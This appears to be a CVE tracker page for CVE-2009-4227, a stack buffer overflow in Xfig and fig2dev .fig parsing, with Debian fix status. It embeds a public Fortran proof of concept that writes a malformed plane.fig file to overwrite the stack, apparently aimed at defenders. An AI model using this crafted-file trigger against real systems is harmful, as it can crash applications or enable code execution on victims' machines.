CVE-2009-4227

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Stack-based buffer overflow in the read_1_3_textobject function in f_readold.c in Xfig 3.2.5b and earlier, and in the read_textobject function in read1_3.c in fig2dev in Transfig 3.2.5a and earlier, allows remote attackers to execute arbitrary code via a long string in a malformed .fig file that uses the 1.3 file format. NOTE: some of these details are obtained from third party information.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-33388 remote linux verified text · 2 KB

pedamachephepto · 2009-12-03

Xfig and Transfig 3.2.5 - '.fig' Remote Buffer Overflow

text exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/37193/info

Xfig and Transfig are prone to a buffer-overflow vulnerability because they fail to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Xfig and Transfig 3.2.5 are vulnerable; other versions may also be affected. 

       PROGRAM XFIG_POC

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
C
C      XFIG <= 3.2.5B BUFFER OVERFLOW
C      TRANSFIG <= 3.2.5A (FIG2DEV SOFT) BUFFER OVERFLOW
C      WWW.XFIG.ORG
C
C      AUTHORS:
C      * PEDAMACHEPHEPTOLIONES <pedamachepheptoliones@gmail.com>
C      * D.B. COOPER
C
C      PROBLEM:
C      A STACK-BASED BUFFER OVERFLOW OCCURS IN read_1_3_textobject()
C      WHEN READING MALFORMED .FIG FILES
C      EIP IS OVERWRITTEN SO IT'S NOT JUST A CRASH
C
C      TEST:
C      xfig plane.fig
C      fig2dev -L png plane.fig
C      (IT DOESN'T HAVE TO BE "PNG")
C
C      SOLUTION:
C      DON'T TAKE .FIG CANDY FROM STRANGERS
C
C      OLDSKOOL FORTRAN POCS FTW
C
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

       INTEGER I
       CHARACTER(LEN=167) :: STR

       DO 10 I=1,167
       STR(I:I)='Z'
10     CONTINUE

       OPEN(11,FILE='plane.fig')
       WRITE(11,*) '0 1 2 3'
       WRITE(11,*) '4'
       WRITE(11,*) '1 2 3 4 5 6 7 '//STR
       CLOSE(11)

       WRITE(*,*) 'GREETZ: BACKUS AND BACCHUS'

       END PROGRAM XFIG_POC

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`1:3.2.5.b-1`
sid	Fixed	`1:3.2.5.b-1`
forky	Fixed	`1:3.2.5.b-1`
bullseye	Fixed	`1:3.2.5.b-1`
bookworm	Fixed	`1:3.2.5.b-1`

References

https://security-tracker.debian.org/tracker/CVE-2009-4227

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.